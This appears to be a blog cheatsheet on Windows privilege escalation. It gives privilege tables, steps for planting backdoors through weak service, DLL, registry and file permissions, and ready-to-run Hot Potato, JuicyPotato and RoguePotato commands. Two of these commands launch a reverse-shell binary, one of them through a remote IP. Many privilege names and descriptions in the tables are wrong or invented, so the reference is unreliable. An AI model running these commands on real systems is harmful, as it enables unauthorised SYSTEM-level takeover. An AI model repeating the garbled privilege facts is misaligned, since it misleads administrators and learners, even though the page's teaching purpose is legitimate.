Windows Privilege Escalation is a crucial technique for ethical hackers and security professionals to learn as it allows them to elevate their privileges on a Windows system and gain access to sensitive information or execute unauthorized actions. This Cheatsheet is a comprehensive guide to Windows Privilege Escalation that outlines various techniques for exploiting weak service permissions, unquoted service paths, DLL hijacking, weak registry permissions, insecure service startup, weak file permissions, weak credentials, and AlwaysInstallElevated. By following this Cheatsheet, security professionals can better understand how to identify and exploit Windows Privilege Escalation vulnerabilities to secure their own systems or to conduct ethical hacking activities.

Note that this is not an exhaustive list and there may be other privileges available depending on the version of Windows and the specific configuration of the system.

Desktop view recommended in mobile

Security Management Privileges

Privilege NameConstant NameDescription
Assign Primary TokenSE_ASSIGNPRIMARYTOKEN_NAMEAllows a process to replace the token that represents a client with another token.
BackupSE_BACKUP_NAMEAllows a user or process to bypass file and directory permissions to back up the system.
RestoreSE_RESTORE_NAMEAllows a user or process to bypass file and directory permissions to restore the system.
SecuritySE_SECURITY_NAMEAllows a user or process to modify security settings of objects, such as files, directories, and registry keys.

System Privileges

Privilege NameConstant NameDescription
Change NotifySE_CHANGE_NOTIFY_NAMEAllows a user or process to receive notifications when a file or directory is changed.
DebugSE_DEBUG_NAMEAllows a user or process to debug another process.
ShutdownSE_SHUTDOWN_NAMEAllows a user or process to shut down the system.
System TimeSE_SYSTEMTIME_NAMEAllows a user or process to modify the system time.
Take OwnershipSE_TAKE_OWNERSHIP_NAMEAllows a user or process to take ownership of files, directories, and other objects.

User Rights

User RightConstant NameDescription
Access Credential ManagerSeInteractiveLogonRightAllows a user to manage credentials, such as usernames and passwords, stored on the computer.
Change the System TimeSeSystemtimePrivilegeAllows a user to modify the system time.
Log on as a batch jobSeBatchLogonRightAllows a user to log on as a batch job, which is a set of instructions that are processed in sequence, without requiring user interaction.
Log on as a serviceSeServiceLogonRightAllows a user to log on as a service, which is a program that runs in the background and provides a specific function to other programs or users.
Remote Desktop ServicesSeRemoteInteractiveLogonRightAllows a user to connect to the computer using Remote Desktop.
Restore Files and DirectoriesSeRestorePrivilegeAllows a user to restore files and directories, which is useful for recovering data that has been accidentally deleted or corrupted.
Shut down the systemSeShutdownPrivilegeAllows a user to shut down the system.
Take ownership of files or other objectsSeTakeOwnershipPrivilegeAllows a user to take ownership of files, directories, and other objects.

Process Management Privileges

Privilege NameConstant NameDescription
Create ProcessSE_CREATE_PROCESS_NAMEAllows a user or process to create a new process.
Create ThreadSE_CREATE_THREAD_NAMEAllows a user or process to create a new thread within a process.
Debug ProcessSE_DEBUG_NAMEAllows a user or process to debug another process.
Set Session IDSE_ASSIGNPRIMARYTOKEN_NAMEAllows a user or process to set the session identifier (ID) for a process.
Terminate ProcessSE_TERMINATE_NAMEAllows a user or process to terminate a process.

Network Privileges

Privilege NameConstant NameDescription
Access Network ConnectionsSE_NETWORK_NAMEAllows a user or process to access network-related information, such as the network address of a computer.
Impersonate a ClientSE_IMPERSONATE_NAMEAllows a user or process to impersonate another user, which means that the user or process can act as if it were the other user. This is useful for accessing network resources that are restricted to a particular user.
Manage auditing and security logSE_AUDIT_NAMEAllows a user or process to manage the security log, which contains records of security-related events, such as logon attempts and file access attempts.

Miscellaneous Privileges

Privilege NameConstant NameDescription
Act as part of the operating systemSE_TCB_NAMEAllows a user or process to perform actions that are normally reserved for the operating system, such as installing device drivers and modifying system settings.
Allow log on locallySeInteractiveLogonRightAllows a user to log on locally to the computer.
Bypass traverse checkingSeChangeNotifyPrivilegeAllows a user or process to bypass checks that prevent the user or process from accessing files and directories that are located outside of the user’s or process’s scope.
Increase scheduling prioritySE_INC_BASE_PRIORITY_NAMEAllows a user or process to increase the scheduling priority of a process, which means that the process will be given more resources, such as CPU time, than other processes.
Load and unload device driversSE_LOAD_DRIVER_NAMEAllows a user or process to load and unload device drivers, which are programs that interact with hardware devices, such as printers and disk drives.
Lock pages in memorySE_LOCK_MEMORY_NAMEAllows a user or process to lock pages in memory, which means that the pages cannot be paged out to the paging file. This is useful for programs that need to access data quickly and efficiently.
Profile system performanceSE_PROF_SINGLE_PROCESS_NAMEAllows a user or process to profile the performance of a single process, which means that the user or process can collect data about how much CPU time, memory, and other resources the process is using.

Security and User Rights Privileges

Privilege NameConstant NameDescription
Add workstations to domainSeMachineAccountPrivilegeAllows a user or process to add computers to a domain.
Backup files and directoriesSeBackupPrivilegeAllows a user or process to back up files and directories on the computer.
Change the system timeSeSystemtimePrivilegeAllows a user or process to change the system time on the computer.
Generate security auditsSeAuditPrivilegeAllows a user or process to generate security-related audit messages in the Security log.
Manage auditing and security logSeSecurityPrivilegeAllows a user or process to manage the security log, which contains records of security-related events, such as logon attempts and file access attempts.
Modify firmware environment valuesSeSystemEnvironmentPrivilegeAllows a user or process to modify the firmware environment variables on the computer, which are used to store configuration information for hardware devices.
Restore files and directoriesSeRestorePrivilegeAllows a user or process to restore files and directories on the computer.
Take ownership of files or other objectsSeTakeOwnershipPrivilegeAllows a user or process to take ownership of files or other objects on the computer. This is useful for recovering access to files or directories that have been locked down or for troubleshooting permissions issues.

Service Privileges

Privilege NameConstant NameDescription
Create a token objectSeCreateTokenPrivilegeAllows a user or process to create a token object, which is an object that contains security-related information, such as the user’s or process’s identity and group memberships. This is useful for creating a new process with specific security settings.
Manage the backup and restore privilegesSeBackupPrivilegeAllows a user or process to manage the backup and restore privileges, which are used to back up and restore files and directories on the computer.
Query Service StatusSeQueryServiceStatusPrivilegeAllows a user or process to query the status of a service, which is a program that runs in the background and provides functionality to other programs.
Start a serviceSeServiceLogonRightAllows a user or process to start a service, which is a program that runs in the background and provides functionality to other programs.
Stop a serviceSeServiceLogonRightAllows a user or process to stop a service, which is a program that runs in the background and provides functionality to other programs.

Virtualization Privileges

Privilege NameConstant NameDescription
Create a virtual machineSeCreateVirtualMachinePrivilegeAllows a user or process to create a virtual machine, which is a software emulation of a computer system. This is useful for running multiple operating systems or applications on a single computer or for creating test environments.
Modify firmware settingsSeSystemEnvironmentPrivilegeAllows a user or process to modify the computer’s firmware settings, such as the boot order or startup configuration. This is useful for administrators who need to configure the computer’s firmware or for troubleshooting issues related to the computer’s startup process.

Remote Desktop Privileges

Privilege NameConstant NameDescription
Allow logon through Remote Desktop ServicesSeRemoteInteractiveLogonRightAllows a user to log on to a remote computer using Remote Desktop. This privilege is required for users who want to connect to a remote computer using Remote Desktop.
Deny logon through Remote Desktop ServicesSeDenyRemoteInteractiveLogonRightDenies a user the ability to log on to a remote computer using Remote Desktop. This privilege is useful for administrators who want to restrict Remote Desktop access to certain users or groups.

Backup and Restore Privileges

Privilege NameConstant NameDescription
Back up files and directoriesSeBackupPrivilegeAllows a user or process to back up files and directories, which means that the user or process can create backups of files and directories even if they do not have explicit permissions to access them. This is useful for backup and disaster recovery purposes.
Restore files and directoriesSeRestorePrivilegeAllows a user or process to restore files and directories, which means that the user or process can restore backups of files and directories to their original locations. This is useful for restoring data that has been lost or damaged.

Cryptography Privileges

Privilege NameConstant NameDescription
Create a pagefileSeCreatePagefilePrivilegeAllows a user or process to create a pagefile, which is a file on disk that is used to store data that does not fit into physical memory. This is useful for improving system performance by providing additional virtual memory.
Manage volumesSeManageVolumePrivilegeAllows a user or process to manage volumes, which are logical partitions on a disk. This is useful for managing disk space, creating new volumes, or troubleshooting issues related to disk management.

Exploiting Weak Service Permissions

TechniqueDescription
Find weak service permissions using tools like accesschk.exe or sc.exeSearch for services with weak file or registry permissions
Modify service binary or configuration file to include a backdoorReplace the service binary or configuration file with a backdoored version
Start the service and gain elevated privilegesStart the vulnerable service to execute the backdoor with elevated privileges

Exploiting Unquoted Service Paths

TechniqueDescription
Identify services with unquoted service paths using wmic service get name, displayname, pathname, startmode commandSearch for services with unquoted service paths
Create a malicious file with the same name as the vulnerable service and place it in the directory specified by the service pathCreate a malicious file and place it in a directory that the vulnerable service searches for executable files
Start the vulnerable service to execute the malicious file with elevated privilegesStart the vulnerable service to execute the backdoor with elevated privileges

Exploiting DLL Hijacking

TechniqueDescription
Identify vulnerable applications using tools like procmon.exe or dependencywalker.comSearch for applications that load DLLs with a predictable name from a directory that is writable by the attacker
Create a malicious DLL with the same name as the vulnerable DLL and place it in a directory that the application searches for DLLsCreate a malicious DLL and place it in a directory that the vulnerable application searches for DLLs
Start the vulnerable application to execute the malicious DLL with elevated privilegesStart the vulnerable application to execute the backdoor with elevated privileges

Exploiting Weak Registry Permissions

TechniqueDescription
Find weak registry permissions using tools like accesschk.exe or regedit.exeSearch for registry keys with weak permissions
Modify a registry key to include a backdoorModify a vulnerable registry key to include a backdoor
Restart the system to gain elevated privilegesRestart the system to execute the backdoor with elevated privileges

Exploiting Insecure Service Startup

TechniqueDescription
Find services that run with high privileges using tools like sc.exe, tasklist.exe, or task managerSearch for services that run with high privileges and can be stopped and started by non-administrative users
Stop the service and replace the binary or configuration file with a backdoored oneStop the vulnerable service and replace the binary or configuration file with a backdoored version
Start the service to execute the backdoor with elevated privilegesStart the vulnerable service to execute the backdoor with elevated privileges

Exploiting Weak File Permissions

TechniqueDescription
Find files with weak permissions using tools like accesschk.exe or cacls.exeSearch for files with weak permissions that are executed by an administrator
Modify the file to include a backdoorModify the vulnerable file to include a backdoor
Wait for an administrator to execute the file to gain elevated privilegesWait for an administrator to execute the vulnerable file and execute the backdoor with elevated privileges

Exploiting Weak Credentials

TechniqueDescription
Find weak credentials using tools like hashdump.exe, mimikatz.exe, or metasploit-frameworkSearch for weak or default credentials
Use the credentials to gain administrative access to the systemUse the obtained credentials to gain administrative access to the system

Exploiting Clear Text password

TechniqueDescription
Identify services, applications or scripts that store passwords in clear textSearch for clear text passwords in configuration files, scripts, or memory dumps using tools like grep or strings
Extract the clear text passwordExtract the password from the configuration file, script, or memory dump using tools like awk, sed, or python
Use the obtained credentials to gain administrative access to the systemUse the obtained credentials to gain administrative access to the system

Note: It’s important to note that exploiting clear text passwords is not recommended as it is a significant security risk. It is important to use secure password storage methods, such as encryption or hashing, to protect sensitive information.

Dangerous User Privileges

Some privileges for a user is dangerous. They could lead to escalate to higher privilege I will list some of them:

SEImpersonatePrivilege

It can act as any other user, such as, Administrator. The vulnerability could be exploited with JuicyPotato

SeAssignPrimaryPrivilege

Assign an access token to new process. Can be exploited with JuicyPotato

SeBackUpPrivilege

If a user has this privilege he is able to read files. That’s mean the user can extract password/hash from registry which could be used for pass-the-hash attack

SeRestorePrivilege

This privilege grant a user to modify service binary, dll, also modify registry settings

Others risky Privilege

  1. SeCreateTokenPrivilege
  2. SeLoadDriverPrivilege
  3. SeDebugPrivilege

Hot Potato Exploit

A Tutorial: https://pentestlab.blog/2017/04/13/hot-potato/

Windows 7

.\Potato.exe -ip <local ip> -cmd <command to run> -enable_defender true -enable_spoof true -disable_exhaust true

Windows 10

.\Potato.exe -ip <local ip> -cmd <cmd to run> -disable_exhaust true -disable_defender true

Juicy Potato

If SeImpersonate/SeAssignPrimaryToken JuicyPotato can be used to escalated privilege.

Note: CLSID can be found in: https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md

JuicyPotato.exe -l 4444 -p C:\Windows\Temp\Rev.exe -t * -c {CLS_ID}

Rogue Potato

Just another Windows Local Privilege Escalation from Service Account to System. So the requirement is the accessed account needed to be a service account.

.\RoguePotato.exe -r 192.168.1.11 –l 9999 -e "C:\Windows\Temp\rev.exe
Shares:

Leave a Reply

Your email address will not be published. Required fields are marked *